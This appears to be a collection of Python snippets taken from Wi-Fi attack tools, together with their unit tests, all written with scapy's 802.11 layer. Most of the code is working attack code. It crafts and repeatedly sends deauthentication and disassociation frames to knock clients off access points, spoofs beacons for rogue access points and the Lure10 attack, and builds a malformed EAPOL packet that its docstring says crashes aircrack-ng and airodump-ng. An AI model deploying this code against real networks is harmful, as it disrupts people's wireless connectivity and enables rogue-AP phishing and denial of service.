def _craft_client_deauth(self, client_bssid): """ Crafts two DEAUTH frames: 1 from the AP to the client and 1 from the client to the AP. :param self: A Deauthentication object. :param client_bssid: The MAC address of the selected acess point. :type self: Deauthentication :type packet: string :return: None :rtype: None """ packet = dot11.Dot11( type=0, subtype=12, addr1=self._ap_bssid, addr2=client_bssid, addr3=client_bssid) / \ dot11.Dot11Deauth() self._pkts.append(packet) packet = dot11.Dot11( type=0, subtype=12, addr1=client_bssid, addr2=self._ap_bssid, addr3=self._ap_bssid) / \ dot11.Dot11Deauth() self._pkts.append(packet)
def _craft_packet(sender, receiver, bssid): """ Return a list with disassociation packet followed by a deauthentication packet :param sender: The MAC address of the sender :param receiver: The MAC address of the receiver :param bssid: The MAC address of the AccessPoint :type sender: str :type receiver: str :type bssid: str :return: list :rtype: A list with disassociation followed by deauthentication packet """ # craft disassociation packet disassoc_part = dot11.Dot11( type=0, subtype=10, addr1=receiver, addr2=sender, addr3=bssid) disassoc_packet = ( dot11.RadioTap() / disassoc_part / dot11.Dot11Disas()) # craft deauthentication packet deauth_part = dot11.Dot11( type=0, subtype=12, addr1=receiver, addr2=sender, addr3=bssid) deauth_packet = (dot11.RadioTap() / deauth_part / dot11.Dot11Deauth()) return [disassoc_packet, deauth_packet]
def _craft_and_add_packet(self, sender, receiver): """ Craft a deauthentication and a disassociation packet and add them to the list of deauthentication packets :param self: A Deauthentication object :param sender: The MAC address of the sender :param receiver: The MAC address of the receiver :type self: Deauthentication :type sender: string :type receiver: string :return: None :rtype: None """ deauth_packet = (dot11.RadioTap() / dot11.Dot11(type=0, subtype=12, \ addr1=receiver, addr2=sender, addr3=self._ap_bssid) \ / dot11.Dot11Deauth()) disassoc_packet = (dot11.RadioTap() / dot11.Dot11(type=0, subtype=10, \ addr1=receiver, addr2=sender, addr3=self._ap_bssid) \ / dot11.Dot11Disas()) self._deauthentication_packets.append(disassoc_packet) self._deauthentication_packets.append(deauth_packet)
def test_multiple_extensions(self): # We need a NM to init EM nm = interfaces.NetworkManager() # Init an EM and pass some shared data em = extensions.ExtensionManager(nm) em.set_extensions(constants.DEFAULT_EXTENSIONS) shared_data = {"one": 1, "two": 2, "is_freq_hop_allowed": True} em.init_extensions(shared_data) # A deauth packet appears in the air packet = ( dot11.RadioTap() / dot11.Dot11( type=0, subtype=12, addr1="00:00:00:00:00:00", addr2="00:00:00:00:00:00", addr3="00:00:00:00:00:00") / dot11.Dot11Deauth()) em._process_packet(packet) # Packets to send have been merged from the two extensions # Validate with get_packet() assert em._packets_to_send["1"] == [1, 2, 3, 4] # Output has also been merged in one list. # Validate with send_output() assert em.get_output() == ["one", "two", "three", "four", "five"]
def setUp(self): """ Set up the tests """ essid = dot11.Dot11Elt(ID='SSID', info="") rates = dot11.Dot11Elt(ID='Rates', info="\x03\x12\x96\x18\x24\x30\x48\x60") dsset = dot11.Dot11Elt(ID='DSset', info='\x06') self.packet = dot11.RadioTap() / dot11.Dot11() / essid / rates / dsset custom_tuple = collections.namedtuple( "test", ("target_ap_bssid target_ap_channel rogue_ap_mac args " "target_ap_essid is_freq_hop_allowed")) self.target_channel = "6" self.target_bssid = "BB:BB:BB:BB:BB:BB" self.rogue_mac = "CC:CC:CC:CC:CC:CC" self.target_essid = "Evil" self.args = mock.Mock() self.args.deauth_essid = False self.args.channel_monitor = False data0 = custom_tuple(self.target_bssid, self.target_channel, self.rogue_mac, self.args, self.target_essid, True) data1 = custom_tuple(None, self.target_channel, self.rogue_mac, self.args, self.target_essid, True) self.deauth_obj0 = deauth.Deauth(data0) self.deauth_obj1 = deauth.Deauth(data1) # test for --deauth-essid self.deauth_obj0._deauth_bssids = dict() self.deauth_obj1._deauth_bssids = dict()
def send_deauthentication_packets(self): """ Send deauthentication packets using RadioTap header. :param self: A Deauthentication object. :type self: Deauthentication :return: None :rtype: None .. note: Information regarding IEEE 802.11 and for deauthentication which could be useful for maintenance purposes. Type could have values of 0 for managment, 1 for control, 2 for data. There are a lot of subtpyes but subtype 12 is for deauthentication packets. addr1, addr2, addr3 are destination address, sender address, sender transmited address respectivly. """ # continue to deauthenticate until otherwise set while self._should_continue: # added to reduce the stress on system and allow user to connect if self._observed_clients: for client in self._observed_clients: packet = (dot11.RadioTap() / dot11.Dot11(type=0, subtype=12, addr1=client, addr2=self._ap_bssid, addr3=self._ap_bssid) / dot11.Dot11Deauth()) scapy.sendrecv.sendp(packet, count=1, verbose=False)
def get_packet(self, pkt): """ We start broadcasting the beacons on the first received packet :param self: A Lure10 object :param packet: A scapy.layers.RadioTap object :type self: Lure10 :type packet: scapy.layers.RadioTap :return: A tuple containing ["*"] followed by a list of the crafted beacon frames :rtype: tuple(list, list) .. warning: pkt is not used here but should not be removed since this prototype is requirement """ beacons = list() bssid = str() # initiliate the _packets_to_send in first run if self.first_run: self._packets_to_send["*"] = beacons # only run this code once if self.first_run and self.data.args.lure10_exploit: # locate the lure10 file area_file = constants.LOCS_DIR + self.data.args.lure10_exploit with open(area_file) as _file: for line in _file: # remove any white space and store the bssid(fist word) line.strip() bssid = line.split(" ", 1)[0] # craft the required packet parts frame_part_0 = dot11.RadioTap() frame_part_1 = dot11.Dot11(subtype=8, addr1=constants.WIFI_BROADCAST, addr2=bssid, addr3=bssid) frame_part_2 = dot11.Dot11Beacon(cap=0x2105) frame_part_3 = dot11.Dot11Elt(ID="SSID", info="") frame_part_4 = dot11.Dot11Elt(ID="Rates", info=constants.AP_RATES) frame_part_5 = dot11.Dot11Elt(ID="DSset", info=chr(7)) # create a complete packet by combining the parts complete_frame = (frame_part_0 / frame_part_1 / frame_part_2 / frame_part_3 / frame_part_4 / frame_part_5) logger.debug("Add lure10-beacon frame with BSSID %s", bssid) # add the frame to the list beacons.append(complete_frame) # make sure this block is never executed again and the notification occurs self.first_run = False self._packets_to_send["*"] = beacons return self._packets_to_send
def test_is_packet_valid_packet_valid(): """ Test is_packet_valid function with an packet that is not Dot11Beacon """ address = "FF:FF:FF:FF:FF:FF" packet = (dot11.Dot11(type=0, subtype=10, addr3=address) / dot11.Dot11Beacon() / dot11.Dot11Elt(ID=0, info="MY AP") / dot11.Dot11Elt() / dot11.Dot11Elt(ID=3, info=chr(2))) assert recon.is_packet_valid(packet) == True
def test_is_packet_valid_packet_not_beacon(): """ Test is_packet_valid function with an packet that is not Dot11Beacon """ address = "FF:FF:FF:FF:FF:FF" packet = (dot11.RadioTap() / dot11.Dot11(type=0, subtype=10, addr3=address) / dot11.Dot11Disas()) assert recon.is_packet_valid(packet) == False
def test_is_target_essid_non_decodable_error(self): """ Assign essid to a constant when it is utf-8 non-decodable """ essid = dot11.Dot11Elt(ID='SSID', info='\x99\x87\x33') packet = dot11.RadioTap() / dot11.Dot11() / dot11.Dot11Beacon() / essid packet.addr3 = "99:99:99:99:99:99" result = self.deauth_obj0._is_target(packet) expected = False message = 'Fail to raise the UnicodeDecodeError for non-printable essid' self.assertEqual(result, expected, message)
def handle_packet(self, pkt): """See util/scan.py """ try: pkt = scapy.layers.rftap.RFtap(pkt) except: pkt = dot11.Dot11(pkt) pkt.show() self.packets.append(pkt) # TODO Save RFTap layer too...doesn't read write in wireshark, # so just save the payload, which is the packet data without RFTap wrpcap(self.filename, pkt.payload, append=True)
def _craft_packet(sender, receiver, bssid): """ Craft a deauthentication and a disassociation packet and add them to the list of deauthentication packets :param self: A Deauthentication object :param sender: The MAC address of the sender :param receiver: The MAC address of the receiver :param bssid: The MAC address of the AccessPoint :type self: Deauthentication :type sender: string :type receiver: string :type bssid: string :return: None :rtype: None """ deauth_packet = ( dot11.RadioTap() / dot11.Dot11( type=0, subtype=12, addr1=receiver, addr2=sender, addr3=bssid) / dot11.Dot11Deauth()) disassoc_packet = ( dot11.RadioTap() / dot11.Dot11( type=0, subtype=10, addr1=receiver, addr2=sender, addr3=bssid) / dot11.Dot11Disas()) return [disassoc_packet, deauth_packet]
def __init__(self, iface, bssid, essid, channel): threading.Thread.__init__(self) self.active = True self.device = NetworkTransmitter(iface) self.device.setchannel(channel) self.sta_mac = str(scapy.fields.RandMAC(template='00:*')) self.ap = AccessPoint(iface, bssid, essid, channel) """A dummy data-packet to generate traffic...""" self.data_pckt = dot11.Dot11(type="Data", addr1=self.sta_mac, \ addr2=bssid, addr3=bssid, \ FCfield='from-DS') \ / dot11.LLC() \ / dot11.SNAP() \ / dot11.EAPOL() \ / scapy.packet.Padding(load='a' * 100) """A IEEE802.11-packet with LLC- and SNAP-header, looking like the second phase of a EAPOL-handshake (the confirmation). The packet will cause an overflow of the "eapol"-field in struct WPA_hdsk as defined in aircrack-ng.h and set eapol_size to a bogus value (crashing the PTK-calculation), type to 0 and state to 7 (completed handshake). The last 500 dummy-bytes will crash airodump-ng. Remove those to make airodump-ng go on and aircrack-ng show a completed handshake for our fake AP. Aircrack-ng will crash while computing the PTK... """ self.xp_pckt = dot11.Dot11(addr1='00:de:ad:c0:de:00', \ addr2=self.sta_mac, FCfield='to-DS') \ / dot11.LLC() \ / dot11.SNAP() \ / l2.EAPOL() \ / cpyrit.pckttools.EAPOL_Key() \ / cpyrit.pckttools.EAPOL_WPAKey(KeyInfo='pairwise+mic') \ / scapy.packet.Padding(load=('a' * 159) \ + '\xff\xff\xff\x0f' \ + '\x00\x00\x00\x00' \ + '\x07\x00\x00\x00' + 'a' * 300) self.setDaemon(True)
def test_get_new_ap_packet_no_encryption(sniff): """ Test get_new_ap function with a packet where AP is not encrypted """ name = "MY_AP" channel = 2 address = "FF:FF:FF:FF:FF:FF" packet = (dot11.Dot11(type=0, subtype=10, addr3=address) / dot11.Dot11Beacon(cap=0x0000) / dot11.Dot11Elt(ID=0, info=name) / dot11.Dot11Elt() / dot11.Dot11Elt(ID=3, info=chr(channel))) sniff.return_value = [packet] assert recon.get_new_ap("wlan0") == (name, channel, address, False)
def test_get_new_ap_valid_packet(sniff): """ Test get_new_ap function with a valid(standard) packet """ name = "MY_AP" channel = 2 address = "FF:FF:FF:FF:FF:FF" packet = (dot11.Dot11(type=0, subtype=10, addr3=address) / dot11.Dot11Beacon(cap=0x1111) / dot11.Dot11Elt(ID=0, info=name) / dot11.Dot11Elt() / dot11.Dot11Elt(ID=3, info=chr(channel))) sniff.return_value = [packet] assert recon.get_new_ap("wlan0") == (name, channel, address, True)
def test_is_target_target_ap_bssid_true(self): """ Get the target attacking bssid for the speficic ESSID when --essid is not used """ essid = dot11.Dot11Elt(ID='SSID', info="Evil") packet = dot11.RadioTap() / dot11.Dot11() / dot11.Dot11Beacon() / essid packet.addr3 = "99:99:99:99:99:99" self.deauth_obj0._data.args.deauth_essid = "Evil" result = self.deauth_obj0._is_target(packet) expected = True message = "Fail to check the attacking essid: " + self.target_essid self.assertEqual(result, expected, message)
def __init__(self, iface, essid, bssid, channel, beacon_interval_sec, packet_callback): self.active = False self.iface = iface self.essid = essid self.bssid = bssid self.channel = channel self.beacon_interval_sec = beacon_interval_sec self.packet_callback = packet_callback self.start_time_secs = time.time() self.sc = 0 self.sender = PacketSender(self.iface) self.beacon_packet = dot11.Dot11(addr1='ff:ff:ff:ff:ff:ff', \ addr2=self.bssid, \ addr3=self.bssid) \ / dot11.Dot11Beacon(cap='ESS+privacy') \ / dot11.Dot11Elt(ID='SSID', \ info=self.essid) \ / dot11.Dot11Elt(ID='DSset', \ info=chr(self.channel)) \ / dot11.Dot11Elt(ID='Rates', \ info='\x82\x84\x0b\x16') \ / dot11.Dot11Elt(ID='RSNinfo', info='\x01\x00\x00\x0f\xac' \ '\x04\x01\x00\x00\x0f' \ '\xac\x04\x01\x00\x00' \ '\x0f\xac\x02\x00\x00') self.watchers = { "interval": None, "timeout": None } self.loop = pyev.Loop() # initialize and start a signal watchers sigterm_watcher = pyev.Signal(signal.SIGTERM, self.loop, self.sigterm_cb) sigterm_watcher.start() sigint_watcher = pyev.Signal(signal.SIGINT, self.loop, self.sigint_cb) sigint_watcher.start() self.loop.data = [sigterm_watcher, sigint_watcher] self.sniff_thread = Thread(target=self.sniff, kwargs=dict(), name='sniff-thread') self.sniff_thread.setDaemon(True)
def test_multiple_extensions(self, send_func): # Init an EM and pass some shared data self.em = extensions.ExtensionManager() shared_data = {"one": 1, "two": 2} self.em.init_extensions(shared_data) self.em.start_extensions() # A deauth packet appears in the air packet = (dot11.RadioTap() / dot11.Dot11(type=0, subtype=12, \ addr1="00:00:00:00:00:00", addr2="00:00:00:00:00:00", addr3="00:00:00:00:00:00") \ / dot11.Dot11Deauth()) self.em._process_packet(packet) # Packets to send have been merged from the two extensions # Validate with get_packet() assert self.em._packets_to_send == [1, 2, 3, 4] # Output has also been merged in one list. # Validate with send_output() assert self.em.get_output() == ["one", "two", "three", "four", "five"]
def _craft_broadcast_deauth(self): """ Crafts one DEAUTH frame to the broadcast address. :param self: A Deauthentication object. :type self: Deauthentication :return: None :rtype: None """ packet = dot11.Dot11( type=0, subtype=12, addr1=WIFI_BROADCAST, addr2=self._ap_bssid, addr3=self._ap_bssid) / \ dot11.Dot11Deauth() self._pkts.append(packet)
def get_packet(self, pkt): """ We start broadcasting the beacons on the first received packet. :param self: A Lure10 object. :param packet: A scapy.layers.RadioTap object. :type self: Lure10 :type packet: scapy.layers.RadioTap :return: list with the crafted beacon frames :rtype: list """ beacons = [] if self.first: if self.data.args.lure10_exploit: area_file = constants.LOCS_DIR + self.data.args.lure10_exploit with open(area_file) as a_file: wlans = [x.strip() for x in a_file.readlines()] for wlan in wlans: bssid, essid = wlan.split(' ', 1) # Frequency for channel 7 frequency = struct.pack("<h", 2407 + 7 * 5) ap_rates = "\x0c\x12\x18\x24\x30\x48\x60\x6c" frame = dot11.RadioTap( len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\x00\x6c' + frequency + '\xc0\x00\xc0\x01\x00\x00') / dot11.Dot11( subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=bssid, addr3=bssid) / dot11.Dot11Beacon( cap=0x2105) / dot11.Dot11Elt( ID='SSID', info="") / dot11.Dot11Elt( ID='Rates', info=ap_rates) / dot11.Dot11Elt( ID='DSset', info=chr(7)) beacons.append(frame) self.beacons_num = len(beacons) self.first = False return (["*"], beacons)
def _get_known_beacons(self): """ Retrieve the popular ESSIDs from the text file and then construct all the known beacon frames. :param self: A Beacons object :type self: Beacons :return: A list with all the beacon frames :rtype: list """ beacons = list() essid = str() bssid = self.data.rogue_ap_mac # locate the known WLANS file area_file = constants.KNOWN_WLANS_FILE with open(area_file) as _file: for line in _file: if line.startswith("!"): continue essid = line.rstrip() # craft the required packet parts frame_part_0 = dot11.RadioTap() frame_part_1 = dot11.Dot11( subtype=8, addr1=constants.WIFI_BROADCAST, addr2=bssid, addr3=bssid) frame_part_2 = dot11.Dot11Beacon(cap=constants.KB_BEACON_CAP) frame_part_3 = dot11.Dot11Elt(ID="SSID", info=essid) frame_part_4 = dot11.Dot11Elt( ID="Rates", info=constants.AP_RATES) frame_part_5 = dot11.Dot11Elt(ID="DSset", info=chr(7)) # create a complete packet by combining the parts complete_frame = ( frame_part_0 / frame_part_1 / frame_part_2 / frame_part_3 / frame_part_4 / frame_part_5) # add the frame to the list beacons.append(complete_frame) return beacons
def test_single_extension(self, send_func): # Init an EM and pass some shared data self.em = extensions.ExtensionManager() shared_data = {"one": 1, "two": 2} self.em.init_extensions(shared_data) assert not send_func.called self.em.start_extensions() # A deauth packet appears in the air packet = (dot11.RadioTap() / dot11.Dot11(type=0, subtype=12, \ addr1="00:00:00:00:00:00", addr2="00:00:00:00:00:00", addr3="00:00:00:00:00:00") \ / dot11.Dot11Deauth()) self.em._process_packet(packet) # After EM starts, the send daemon is triggered and # sends any packets from extensions assert send_func.called == 1 # The extension1.py sent packet "1" and returned output # "one", "two". Validate with get_packet(), send_output() assert self.em._packets_to_send == [1] assert self.em.get_output() == ["one", "two"]
def add_lure10_beacons(self, area_file): with open(area_file) as f: wlans = [x.strip() for x in f.readlines()] for w in wlans: bssid, essid = w.split(' ', 1) # Frequency for channel 7 frequency = struct.pack("<h", 2407 + 7*5) ap_rates = "\x0c\x12\x18\x24\x30\x48\x60\x6c" frame = dot11.RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', \ notdecoded='\x00\x6c' + frequency + \ '\xc0\x00\xc0\x01\x00\x00') \ / dot11.Dot11(subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=bssid, addr3=bssid) \ / dot11.Dot11Beacon(cap=0x2105) \ / dot11.Dot11Elt(ID='SSID', info="") \ / dot11.Dot11Elt(ID='Rates', info=ap_rates) \ / dot11.Dot11Elt(ID='DSset', info=chr(7)) self._deauthentication_packets.append(frame)
def test_single_extension(self): # Init an EM and pass some shared data em = extensions.ExtensionManager() em.set_extensions(constants.DEFAULT_EXTENSIONS) shared_data = {"one": 1, "two": 2} em.init_extensions(shared_data) # A deauth packet appears in the air packet = (dot11.RadioTap() / dot11.Dot11(type=0, subtype=12, addr1="00:00:00:00:00:00", addr2="00:00:00:00:00:00", addr3="00:00:00:00:00:00") / dot11.Dot11Deauth()) em._process_packet(packet) # The extension1.py sent packet "1" and returned output # "one", "two". Validate with get_packet(), send_output() assert em._packets_to_send["1"] == [1] assert em._packets_to_send["2"] == [] assert em.get_output() == ["one", "two"]
def test_get_packet_broadcast(self): """ Test get_packet method for crafting the broadcast frame """ # setup the packet sender = "00:00:00:00:00:00" receiver = "11:11:11:11:11:11" essid = dot11.Dot11Elt(ID='SSID', info="") rates = dot11.Dot11Elt(ID='Rates', info="\x03\x12\x96\x18\x24\x30\x48\x60") dsset = dot11.Dot11Elt(ID='DSset', info='\x06') packet = dot11.RadioTap() / dot11.Dot11() / dot11.Dot11Beacon( ) / essid / rates / dsset packet.addr1 = receiver packet.addr2 = sender packet.addr3 = self.target_bssid packet.FCfield = 0x0 # run the method pkts_to_send = self.deauth_obj0.get_packet(packet) message0 = "Failed to return an correct channel" message1 = "Failed to return an correct packets" # check channel: target channel should be one key of # the result self.assertEqual(self.target_channel in pkts_to_send, True, message0) # check the packets # check the disassoction packet result = pkts_to_send[self.target_channel] self.assertEqual(result[0].subtype, 10, message1) self.assertEqual(result[0].addr1, constants.WIFI_BROADCAST, message1) self.assertEqual(result[0].addr2, self.target_bssid, message1) self.assertEqual(result[0].addr3, self.target_bssid, message1) # check the deauthentication packet self.assertEqual(result[1].subtype, 12, message1) self.assertEqual(result[1].addr1, constants.WIFI_BROADCAST, message1) self.assertEqual(result[1].addr2, self.target_bssid, message1) self.assertEqual(result[1].addr3, self.target_bssid, message1)
def __init__(self, ap): threading.Thread.__init__(self) self.ap = ap self.device = NetworkTransmitter(self.ap.iface) self.interval = 0.1 self.beacon_pckt = dot11.Dot11(addr1='ff:ff:ff:ff:ff:ff', \ addr2=self.ap.bssid,\ addr3=self.ap.bssid) \ / dot11.Dot11Beacon(cap='ESS+privacy') \ / dot11.Dot11Elt(ID='SSID', \ info=self.ap.essid) \ / dot11.Dot11Elt(ID='DSset', \ info=chr(self.ap.channel)) \ / dot11.Dot11Elt(ID='Rates', \ info='\x82\x84\x0b\x16') \ / dot11.Dot11Elt(ID='RSNinfo', info='\x01\x00\x00\x0f\xac' \ '\x04\x01\x00\x00\x0f' \ '\xac\x04\x01\x00\x00' \ '\x0f\xac\x02\x00\x00') self.setDaemon(True)
def setUp(self): """ Set up the tests """ essid = dot11.Dot11Elt(ID='SSID', info="") rates = dot11.Dot11Elt(ID='Rates', info="\x03\x12\x96\x18\x24\x30\x48\x60") dsset = dot11.Dot11Elt(ID='DSset', info='\x06') self.packet = dot11.RadioTap() / dot11.Dot11() / essid / rates / dsset custom_tuple = collections.namedtuple( "test", "target_ap_bssid target_ap_channel rogue_ap_mac") self.target_channel = "6" self.target_bssid = "BB:BB:BB:BB:BB:BB" self.rogue_mac = "CC:CC:CC:CC:CC:CC" data0 = custom_tuple(self.target_bssid, self.target_channel, self.rogue_mac) data1 = custom_tuple(None, self.target_channel, self.rogue_mac) self.deauth_obj0 = deauth.Deauth(data0) self.deauth_obj1 = deauth.Deauth(data1)
def createDeauthPacket(self): """deauth paketi oluşturur""" dt11 = dot11.Dot11(addr1=self.ssid, addr2=self.bssid, addr3=self.bssid) deauthPacket = dot11.RadioTap() / dt11 / dot11.Dot11Deauth(reason=7) return deauthPacket